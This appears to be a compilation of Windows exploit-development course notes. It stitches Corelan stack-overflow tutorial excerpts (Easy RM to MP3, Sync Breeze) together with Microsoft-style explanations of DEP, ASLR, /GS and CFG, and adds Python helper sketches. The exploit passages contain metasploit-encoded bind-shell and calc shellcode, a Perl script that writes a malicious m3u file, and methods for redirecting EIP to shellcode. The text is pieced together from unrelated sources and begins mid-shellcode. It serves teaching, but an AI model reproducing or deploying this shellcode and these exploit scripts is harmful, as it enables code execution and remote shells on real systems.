"\x74\x22\x86\x3f\x28\x84\x79\xaa\xcb\x77\x28\x7f\x9d\x88" .
"\x1a\x17\xb0\xae\x9f\x26\x99\xaf\x49\xdc\xe1\xaf\x42\xde" .
"\xce\xdb\xfb\xdc\x6c\x1f\x67\xe2\xa5\xf2\x98\xcc\x22\x03" .
"\xec\xe9\xed\xb0\x0f\x27\xee\xe7";
As you can see, this shellcode is 344 bytes long (and launching calc only took 144 bytes).
If you just copy&paste this shellcode, you may see that the vulnerable application does not
even crash anymore.
This – most likely – indicates either a problem with the shellcode buffer size (but you can test
the buffer size, you’ll notice that this is not the issue), or we are faced with invalid characters
in the shellcode. You can exclude invalid characters when building the shellcode with
metasploit, but you’ll have to know which characters are allowed and which aren’t. By default,
null bytes are restricted (because they will break the exploit for sure), but what are the other
characters ?
The m3u file probably should contain filenames. So a good start would be to filter out all
characters that are not allowed in filenames and filepaths. You could also restrict the character
set altogether by using another encoder. We have used shikata_ga_nai, but perhaps
alpha_upper will work better for filenames. Using another encoder will most likely increase
the shellcode length, but we have already seen (or we can simulate) that size is not a big issue.
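Checking a payload for unwanted bytes before sending it can be automated. The Python sketch below assumes a restricted set made of the control characters (0x00 to 0x1f) plus the characters Windows does not allow in file names; which bytes this particular application really rejects is not known from these notes and has to be confirmed by testing. The sample bytes are arbitrary, not shellcode.

```python
# Assumed restricted set: control characters and Windows-reserved filename characters.
FILENAME_BAD = set(b'<>:"/\\|?*') | set(range(0x20))

def bad_char_offsets(payload, bad=FILENAME_BAD):
    """Return (offset, byte) pairs for every byte of payload that is in the bad set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

sample = bytes([0x41, 0x42, 0x00, 0x5c, 0x43, 0x3a])   # arbitrary test bytes
found = bad_char_offsets(sample)
clean = bad_char_offsets(b"ABCXYZ019")                 # upper-case letters and digits only
print(found, clean)
```

An encoder such as alpha_upper aims for output in the letters-and-digits range, which is why its output is less likely to contain bytes from a set like this one.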
Let’s try building a tcp shell bind, using the alpha_upper encoder. We’ll bind a shell to local
port 4444. The new shellcode is 703 bytes.
# http://www.metasploit.com
# Encoder: x86/alpha_upper
"\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
<...>
"\x50\x41\x41";
Let’s use this shellcode. The new exploit looks like this : P.S. I have manually broken the
shellcode shown here. So if you copy & paste the exploit it will not work. But you should know
by now how to make a working exploit.
# http://www.corelan.be
#
my $file= "exploitrmtomp3.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
open($FILE,">$file");
close($FILE);
Create the m3u file, open it in the application. Easy RM to MP3 now seems to hang :
Trying 192.168.0.197...
Connected to 192.168.0.197.
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
We need to understand the protective mechanisms that make control of the EIP register more
difficult to obtain or exploit. While the Sync Breeze software was compiled without any of
these security mechanisms, we will be facing some of them in later modules. Microsoft
implements Data Execution Prevention (DEP), Address Space Layout Randomization
(ASLR), and Control Flow Guard (CFG).
DEP is a set of hardware and software technologies that perform additional memory checks to
help prevent malicious code from running on a system. DEP helps prevent code execution from
data pages by raising an exception when attempts are made to do so.
ASLR randomizes the base addresses of loaded applications and DLLs every time the operating
system is booted. On older Windows operating systems, like Windows XP where ASLR is not
implemented, all DLLs are loaded at the same memory address every time, which makes
exploitation easier. When coupled with DEP, ASLR provides a very strong mitigation against
exploitation.
Finally, CFG is Microsoft’s implementation of control-flow integrity. This mechanism validates
indirect code branches, such as a call instruction that takes its target from a register (for
example, CALL EAX) rather than from a fixed memory address. The purpose of this mitigation is
to stop exploits from redirecting execution through overwritten function pointers.
As previously mentioned, Sync Breeze was compiled without any of these security mechanisms,
making the exploitation process much easier. This provides a great opportunity for us to start
learning the exploitation process without having to worry about various mitigations.
Controlling EIP
Gaining control of the EIP register is a crucial step while exploiting memory corruption
vulnerabilities. We can use the EIP register to control the direction or flow of the application.
However, right now we only know that a section of our buffer of A’s overwrote the EIP. Before
we can load a valid destination address into the EIP and control the execution flow, we need to
know which part of our buffer is landing in EIP.
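One common way to find that offset (an assumption here, since the paragraph above does not name a method) is to send a non-repeating pattern instead of A’s and look up the four bytes that end up in EIP. A minimal Python sketch of the idea; the helper names `cyclic_pattern` and `pattern_offset` are illustrative and not taken from any tool:

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# Longest pattern this scheme can produce: 26 * 26 * 10 triplets of 3 bytes.
MAX_PATTERN = 26 * 26 * 10 * 3


def cyclic_pattern(length):
    """Return `length` bytes of the form Aa0Aa1Aa2... (upper, lower, digit)."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would start repeating")
    triplets = product(ascii_uppercase, ascii_lowercase, digits)
    text = "".join(a + b + c for a, b, c in triplets)
    return text[:length].encode("ascii")


def pattern_offset(eip_value, length=MAX_PATTERN):
    """Return the offset of the 4 bytes seen in EIP, or -1 if not found.

    x86 is little-endian, so the register value is packed with "<I" to
    recover the byte order those bytes had inside the buffer.
    """
    needle = struct.pack("<I", eip_value)
    return cyclic_pattern(length).find(needle)
```

In use, the value shown in EIP at crash time is passed to `pattern_offset`, and the result is the number of filler bytes needed before the four bytes that overwrite EIP. When the offset is larger than `MAX_PATTERN`, the pattern can be preceded by filler of a known length.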
DEP prevents code from being run from data pages such as the default heap, stacks, and
memory pools. If an application attempts to run code from a data page that is protected, a
memory access violation exception occurs, and if the exception is not handled, the calling
process is terminated.
If an application attempts to run code from a protected page, the application receives an
exception with the status code STATUS_ACCESS_VIOLATION. If your application must run code
from a memory page, it must allocate and set the proper virtual memory protection attributes.
The allocated memory must be marked PAGE_EXECUTE, PAGE_EXECUTE_READ,
PAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY when allocating memory. Heap
allocations made by calling the malloc and HeapAlloc functions are non-executable.
Applications cannot run code from the default process heap or the stack.
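To make the protection attributes concrete, the sketch below classifies a page protection value as executable or not. The numeric values are the documented Windows memory protection constants; the helper names are illustrative only.

```python
# Windows memory protection constants (base protections, low byte).
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

EXECUTABLE = (PAGE_EXECUTE | PAGE_EXECUTE_READ |
              PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def is_executable(protect):
    """True if the base protection allows code to run from the page.

    Modifier bits above the low byte (for example PAGE_GUARD) are ignored.
    """
    return bool(protect & 0xFF & EXECUTABLE)


def is_writable_and_executable(protect):
    """True for the protections that allow both writing and executing."""
    return (protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
```

A default heap or stack page is typically PAGE_READWRITE, so `is_executable` returns False for it, which is exactly the case in which DEP raises the access violation described above.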
DEP is configured at system boot according to the no-execute page protection policy setting in
the boot configuration data. An application can get the current policy setting by calling
the GetSystemDEPPolicy function. Depending on the policy setting, an application can change
the DEP setting for the current process by calling the SetProcessDEPPolicy function.
Programming Considerations
An application can use the VirtualAlloc function to allocate executable memory with the
appropriate memory protection options. It is suggested that an application set, at a minimum,
the PAGE_EXECUTE memory protection option. After the executable code is generated, it is
recommended that the application set memory protections to disallow write access to the
allocated memory. Applications can disallow write access to allocated memory by using
the VirtualProtect function. Disallowing write access ensures maximum protection for
executable regions of process address space. You should attempt to create applications that
use the smallest executable address space possible, which minimizes the amount of memory
that is exposed to memory exploitation.
You should also attempt to control the layout of your application's virtual memory and create
executable regions. These executable regions should be located in a lower memory space than
non-executable regions. By locating executable regions below non-executable regions, you can
help prevent a buffer overflow from overflowing into the executable area of memory.
Application Compatibility
Some application functionality is incompatible with DEP. Applications that perform dynamic
code generation (such as Just-In-Time code generation) and do not explicitly mark generated
code with execute permission may have compatibility issues on computers that are using DEP.
Applications written to the Active Template Library (ATL) version 7.1 and earlier can attempt to
execute code on pages marked as non-executable, which triggers an NX fault and terminates
the application; for more information, see SetProcessDEPPolicy. Most applications that
perform actions incompatible with DEP must be updated to function properly.
A small number of executable files and libraries may contain executable code in the data
section of an image file. In some cases, applications may place small segments of code
(commonly referred to as thunks) in the data sections. However, DEP marks sections of the
image file that is loaded in memory as non-executable unless the section has the executable
attribute applied.
Therefore, executable code in data sections should be migrated to a code section, or the data
section that contains the executable code should be explicitly marked as executable. The
executable attribute, IMAGE_SCN_MEM_EXECUTE, should be added to
the Characteristics field of the corresponding section header for sections that contain
executable code. For more information about adding attributes to a section, see the
documentation included with your linker.
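As a small illustration of the section attribute discussed above, the sketch below decodes the memory permission bits of a section header's Characteristics field. The three flag values come from the PE format; the function name and the two sample values are assumptions chosen for the example (they are typical of a code section and a data section).

```python
# Section characteristics flags from the PE/COFF format.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_permissions(characteristics):
    """Render the memory permission bits of a section as an 'rwx' string."""
    flags = "r" if characteristics & IMAGE_SCN_MEM_READ else "-"
    flags += "w" if characteristics & IMAGE_SCN_MEM_WRITE else "-"
    flags += "x" if characteristics & IMAGE_SCN_MEM_EXECUTE else "-"
    return flags


# Sample values (assumed for illustration):
TEXT_SECTION = 0x60000020   # code, readable, executable
DATA_SECTION = 0xC0000040   # initialized data, readable, writable
```

With DEP active, code placed in a section like `DATA_SECTION` would fault unless IMAGE_SCN_MEM_EXECUTE is added to its characteristics.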
So what is ASLR? In short, when you boot a Windows Vista Beta 2 computer, we load system
code into different locations in memory. This helps defeat a well-understood attack called
“return-to-libc”, where exploit code attempts to call a system function, such as the socket()
function in wsock32.dll to open a socket, or LoadLibrary in kernel32.dll to load wsock32.dll in
the first place. The job of ASLR is to move these function entry points around in memory so
they are in unpredictable locations. In the case of Windows Vista Beta 2, a DLL or EXE could be
loaded into any of 256 locations, which means an attacker has a 1/256 chance of getting the
address right. In short, this makes it harder for exploits to work correctly.
Load addresses on one boot:
• wsock32.dll (0x73ad0000)
• winhttp.dll (0x74020000)
• user32.dll (0x779b0000)
• kernel32.dll (0x77c10000)
• gdi32.dll (0x77a50000)
Load addresses after a reboot:
• wsock32.dll (0x73200000)
• winhttp.dll (0x73760000)
• user32.dll (0x770f0000)
• kernel32.dll (0x77350000)
• gdi32.dll (0x77190000)
As you can see, various DLLs are loaded at different addresses and this makes it harder for
exploit code to locate and therefore take advantage of functionality inside these DLLs. Not
impossible, just harder.
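The 1/256 figure can be turned into a rough estimate of how often a guessed address would be right. The sketch below is simple arithmetic under one stated assumption: every attempt faces an independently randomized layout (for example a different machine or a fresh boot). The function names are illustrative.

```python
import math

SLOTS = 256  # number of possible load locations quoted above


def success_probability(attempts, slots=SLOTS):
    """Chance that at least one of `attempts` independent guesses is right."""
    return 1.0 - (1.0 - 1.0 / slots) ** attempts


def attempts_for(target, slots=SLOTS):
    """Smallest number of independent guesses reaching probability `target`."""
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - 1.0 / slots))
```

Under that assumption a single guess succeeds with probability 1/256, and `attempts_for(0.5)` gives the number of tries needed for even odds. Since a wrong guess usually crashes the target, this is what "not impossible, just harder" amounts to in practice.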
What really raises the bar however, is the combination of various defenses we now have in
Windows Vista, including:
/GS
This is a compile-time option in Visual C++ (on by default) that adds stack-based buffer overrun
detection. It also juggles around some of the function arguments and the function stack
variable to make some classes of attack harder to pull off. Virtually all Windows Vista binaries
are compiled with this, and we are now in our fourth iteration of /GS!
/SafeSEH
This is a linker option that writes the addresses of exception handlers to the PE header of the
executable, and when an exception is raised, the OS checks the exception handler address
against the list in the PE header, and if the address is not in the list, something corrupted the
exception handler address so the OS kills the process.
Data Execution Prevention (NX)
This requires CPU as well as operating system support. Most (read: all) buffer overruns come
into a vulnerable application as data, and then that data is executed. NX can prevent the
exploit from working by marking data segments as No-Execute; in other words, you can’t run data.
When the WMF flaw was found, I wrote a small malicious WMF file that popped, “oops!” on
the desktop. When I ran this on my computer at home, an AMD 64FX based computer that
supports NX, Windows shut the image viewer down when I read my WMF file because the
operating system detected an attempt to run data.
Function Pointer Obfuscation
Long-lived function pointers are targets for attack because (a) they are long lived (!) and (b)
they point to functions that are called at some point by the code. In Windows Vista we encode
numerous long-lived pointers, and only un-encode them when the pointer is needed. You can
read more about this functionality in a prior blog post “Protecting against Pointer Subterfuge
(Kinda!)”
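The post does not describe the encoding itself. As a minimal sketch, assuming the simplest possible scheme (XOR with a per-process secret, which may differ from what Windows actually does), pointer encoding looks like this; all names are hypothetical:

```python
import secrets

MASK32 = 0xFFFFFFFF


def make_cookie():
    """Pick a random 32-bit secret once per process (assumed scheme)."""
    return secrets.randbits(32)


def encode_pointer(ptr, cookie):
    """Store the pointer XORed with the secret instead of the raw value."""
    return (ptr ^ cookie) & MASK32


def decode_pointer(encoded, cookie):
    """Recover the real pointer just before it is used."""
    return (encoded ^ cookie) & MASK32
```

The point of the technique is that an attacker who overwrites the stored value with a raw address, without knowing the secret, ends up with a different and effectively unpredictable address after decoding.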
Summary
The net of this is ASLR is seen as just another defense, and it’s on by default in Windows Vista
Beta 2. I think the latter point is important, we added ASLR pretty late in the game, but we
decided that adding it to beta 2 and enabling it by default was important so we can understand
how well it performs in the field. By this I mean what the compatibility implications are, and to
give us time to fine tune ASLR before we finally release Windows Vista.
I’ll write more about ASLR and some other defenses in the coming weeks. Please let us know
what you think.
Control Flow Guard (CFG) is a highly-optimized platform security feature that was created to
combat memory corruption vulnerabilities. By placing tight restrictions on where an
application can execute code from, it makes it much harder for exploits to execute arbitrary
code through vulnerabilities such as buffer overflows. CFG extends previous exploit mitigation
technologies such as /GS, DEP, and ASLR.
This feature is available in Microsoft Visual Studio 2015, and runs on "CFG-Aware" versions of
Windows—the x86 and x64 releases for Desktop and Server of Windows 10 and Windows 8.1
Update (KB3000850).
We strongly encourage developers to enable CFG for their applications. You don't have to
enable CFG for every part of your code, as a mixture of CFG enabled and non-CFG enabled
code will execute fine. But failing to enable CFG for all code can open gaps in the protection.
Furthermore, CFG enabled code works fine on "CFG-Unaware" versions of Windows and is
therefore fully compatible with them.
In most cases, there is no need to change source code. All you have to do is add an option to
your Visual Studio 2015 project, and the compiler and linker will enable CFG.
The simplest method is to navigate to Project | Properties | Configuration Properties | C/C++
| Code Generation and choose Yes (/guard:cf) for Control Flow Guard.
If you are building your project from the command line, you can add the same options. For
example, if you are compiling a project called test.cpp, use cl /guard:cf test.cpp /link
/guard:cf.
You also have the option of dynamically controlling the set of icall target addresses that are
considered valid by CFG using the SetProcessValidCallTargets from the Memory Management
API. The same API can be used to specify whether pages are invalid or valid targets for CFG.
The VirtualProtect and VirtualAlloc functions will by default treat a specified region of
executable and committed pages as valid indirect call targets. It is possible to override this
behavior, such as when implementing a Just-in-Time compiler, by
specifying PAGE_TARGETS_INVALID when
calling VirtualAlloc or PAGE_TARGETS_NO_UPDATE when calling VirtualProtect as detailed
under Memory Protection Constants.
To check whether a binary is under CFG, run the dumpbin tool (included in the Visual Studio
2015 installation) from the Visual Studio command prompt with the /headers and /loadconfig
options: dumpbin /headers /loadconfig test.exe. The output for a binary under CFG should show
that the header values include "Guard", and that the load config values include "CF
Instrumented" and "FID table present".
How Does CFG Really Work?
Software vulnerabilities are often exploited by providing unlikely, unusual, or extreme data to
a running program. For example, an attacker can exploit a buffer overflow vulnerability by
providing more input to a program than expected, thereby over-running the area reserved by
the program to hold a response. This could corrupt adjacent memory that may hold a function
pointer. When the program calls through this function it may then jump to an unintended
location specified by the attacker.
However, a potent combination of compile-time and run-time support from CFG implements
control flow integrity that tightly restricts where indirect call instructions can execute.
The compiler identifies the set of functions in the application that are valid targets for
indirect calls.
The run-time support implements the logic that verifies that an indirect call target is valid.
When a CFG check fails at runtime, Windows immediately terminates the program, thus
breaking any exploit that attempts to indirectly call an invalid address.
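The check described above can be modelled in a few lines. This is a conceptual sketch only, not how Windows implements CFG: the set of valid targets stands in for the table produced at compile time, and the exception stands in for the process being terminated. All names and addresses are hypothetical.

```python
class CfgViolation(Exception):
    """Stands in for Windows terminating the program."""


def guarded_indirect_call(target, valid_targets, code):
    """Call `code[target]` only if `target` is a registered call target."""
    if target not in valid_targets:
        raise CfgViolation(hex(target))
    return code[target]()


# A toy address space: one legitimate function and one attacker-chosen location.
code = {
    0x401000: lambda: "legitimate handler",
    0x402000: lambda: "attacker-chosen code",
}
valid_targets = {0x401000}
```

A function pointer that still holds 0x401000 is called normally, while one overwritten with 0x402000 raises `CfgViolation` before any attacker-chosen code runs.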
Note : This tutorial heavily builds on part 1 of the tutorial series, so please take the time to
fully read and understand part 1 before reading part 2.
The fact that we could use “jmp esp” was an almost perfect scenario. It’s not that ‘easy’ every
time. Today I’ll talk about some other ways to execute/jump to shellcode, and finally about
what your options are if you are faced with small buffer sizes.
• jump (or call) a register that points to the shellcode. With this technique, you basically
use a register that contains the address where the shellcode resides and put that
address in EIP. You try to find the opcode of a “jump” or “call” to that register in one of
the dll’s that is loaded when the application runs. When crafting your payload, instead
of overwriting EIP with an address in memory, you need to overwrite EIP with the
address of the “jump to the register”. Of course, this only works if one of the available
registers contains an address that points to the shellcode. This is how we managed to
get our exploit to work in part 1, so I’m not going to discuss this technique in this post
anymore.
• pop return : If none of the registers point directly to the shellcode, but you can see an
address on the stack (first, second, … address on the stack) that points to the
shellcode, then you can load that value into EIP by first putting a pointer to pop ret, or
pop pop ret, or pop pop pop ret (all depending on the location of where the address is
found on the stack) into EIP.
• push return : this method is only slightly different from the “call register” technique. If
you cannot find a jmp <register> or call <register> opcode anywhere, you could simply put the
address on the stack and then do a ret. So you basically try to find a push <register>,
followed by a ret. Find the opcode for this sequence, find an address that performs this
sequence, and overwrite EIP with this address.
• jmp [reg + offset] : If there is a register that points to the buffer containing the
shellcode, but it does not point at the beginning of the shellcode, you can also try to
find an instruction in one of the OS or application dll’s which will add the required
bytes to the register and then jump to the register. I’ll refer to this method as jmp
[reg]+[offset]
• blind return : in my previous post I have explained that ESP points to the current stack
position (by definition). A RET instruction will ‘pop’ the last value (4 bytes) from the
stack and will put that address in EIP. So if you overwrite EIP with the address of a RET
instruction, you will load the value stored at ESP into EIP.
• If you are faced with the fact that the available space in the buffer (after the EIP
overwrite) is limited, but you have plenty of space before overwriting EIP, then you
could use jump code in the smaller buffer to jump to the main shellcode in the first
part of the buffer.
• SEH : Every application has a default exception handler which is provided for by the
OS. So even if the application itself does not use exception handling, you can try to
overwrite the SEH handler with your own address and make it jump to your shellcode.
Using SEH can make an exploit more reliable on various windows platforms, but it
requires some more explanation before you can start abusing the SEH to write
exploits. The idea behind this is that if you build an exploit that does not work on a
given OS, then the payload might just crash the application (and trigger an exception).
So if you can combine a “regular” exploit with a SEH based exploit, then you have built
a more reliable exploit. Anyways, the next part of the exploit writing tutorial series
(part 3) will deal with SEH. Just remember that a typical stack based overflow, where
you overwrite EIP, could potentially be subject to a SEH based exploit technique as
well, giving you more stability, a larger buffer size (and overwriting EIP would trigger
SEH… so it’s a win win)
The techniques explained in this document are just examples. The goal of this post is to
explain to you that there may be various ways to jump to your shellcode, and in other cases
there may be only one (and may require a combination of techniques) to get your arbitrary
code to run.
There may be many more methods to get an exploit to work and to work reliably, but if you
master the ones listed here, and if you use your common sense, you can find a way around
most issues when trying to make an exploit jump to your shellcode. Even if a technique seems
to be working, but the shellcode doesn’t want to run, you can still play with shellcode
encoders, move shellcode a little bit further and put some NOP’s before the shellcode… these
are all things that may help making your exploit work.
Of course, it is perfectly possible that a vulnerability only leads to a crash, and can never be
exploited.
Let’s have a look at the practical implementation of some of the techniques listed above.
call [reg]
If a register is loaded with an address that directly points at the shellcode, then you can do a
call [reg] to jump directly to the shellcode. In other words, if ESP directly points at the
shellcode (so the first byte at ESP is the first byte of your shellcode), then you can overwrite
EIP with the address of “call esp”, and the shellcode will be executed. This works with all
registers and is quite popular because kernel32.dll contains a lot of call [reg] addresses.
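For reference, the opcodes being searched for follow a fixed x86 encoding: `jmp reg` is FF E0+r and `call reg` is FF D0+r, where r is the register number. A small sketch that derives them (helper names are illustrative):

```python
# 32-bit general purpose registers in x86 encoding order (register number 0..7).
REGISTERS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def jmp_reg(reg):
    """Two-byte encoding of `jmp <reg>` (FF /4 with a register operand)."""
    return bytes([0xFF, 0xE0 + REGISTERS.index(reg)])


def call_reg(reg):
    """Two-byte encoding of `call <reg>` (FF /2 with a register operand)."""
    return bytes([0xFF, 0xD0 + REGISTERS.index(reg)])
```

So `call_reg("esp")` yields the two bytes that a tool such as findjmp looks for inside a loaded module, and `jmp_reg("esp")` yields the jmp esp bytes used in part 1.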
Quick example : assuming that ESP points to the shellcode : First, look for an address that
contains the ‘call esp’ opcode. We’ll use findjmp :
Findjmp2, Hat-Squad
Finished Scanning kernel32.dll for code useable with the esp register
From the Easy RM to MP3 example in the first part of this tutorial series, we know that we can
point ESP at the beginning of our shellcode by adding 4 characters between the place where
EIP is overwritten and ESP. A typical exploit would then look like this :
my $file= "test1.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
